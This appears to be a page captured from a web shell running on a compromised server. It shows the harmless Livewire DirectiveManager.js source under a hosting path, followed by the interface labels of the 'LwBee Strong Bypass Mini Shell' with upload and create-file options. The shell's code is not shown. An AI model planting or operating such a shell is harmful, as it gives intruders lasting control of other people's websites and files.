/home/storage/f/3f/a5/aloic1/public_html/core/vendor/livewire/livewire/js/DirectiveManager.js
import MessageBus from "./MessageBus"

export default {
    directives: new MessageBus,

    register(name, callback) {
        if (this.has(name)) {
            throw `Livewire: Directive already registered: [${name}]`
        }

        this.directives.register(name, callback)
    },

    call(name, el, directive, component) {
        this.directives.call(name, el, directive, component)
    },

    has(name) {
        return this.directives.has(name)
    },
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File